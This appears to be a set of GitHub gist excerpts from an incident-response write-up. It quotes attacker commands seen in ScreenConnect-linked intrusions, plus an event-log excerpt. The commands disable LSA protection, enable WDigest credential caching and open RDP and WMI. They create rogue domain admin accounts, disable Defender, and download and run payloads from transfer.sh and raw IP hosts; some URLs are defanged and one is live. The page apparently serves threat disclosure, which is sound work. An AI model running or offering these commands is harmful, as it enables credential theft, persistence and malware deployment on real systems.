This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f | |
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f | |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f | |
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow | |
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes | |
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\" | |
# Check for Administrator rights | |
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { | |
Write-Host 'Please Run as Administrator!' -ForegroundColor Red | |
Exit | |
} | |
# Check and return current user name | |
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1] | |
# Paths |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Excerpt from Application.evtx EventID 0 | |
EventData: | |
Data: | |
- "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n" | |
Channel: Application | |
EventID: 0 | |
EventID_attributes: | |
SystemTime: "2024-02-23T04:06:06Z" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
net user /add default test@2021! /domain | |
net group \"Domain Admins\" default /add /domain | |
net group \"Enterprise Admins\" default /add /domain | |
net group \"Remote Desktop Users\" default /add /domain | |
net group \"Group Policy Creator Owners\" default /add /domain | |
net group \"Schema Admins\" default /add /domain | |
net user default /active:yes /domain | |
net user /add default1 test@2021! /domain | |
net user /add default1 test@2021! /domain |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf | |
#Exclude directory in Defender | |
powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force | |
#Deploy beacon | |
rundll32.exe c:\\programdata\\update.dat UpdateSystem |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json', | |
\'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json', | |
\'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json', | |
\'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json', | |
\'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json', | |
\'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json', | |
\'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json', | |
\'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json', | |
\'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json', | |
\'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -command \"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))\" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\\programdata\\update[.]dat |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#adversary excluded directories and neutralised Defender | |
powershell -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true; | |
Set-MpPreference -ExclusionPath C:\\Windows\\Temp; | |
#then downloaded their file | |
Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\Windows\\Temp\\svchost.exe; | |
C:\\Windows\\Temp\\svchost.exe |
NewerOlder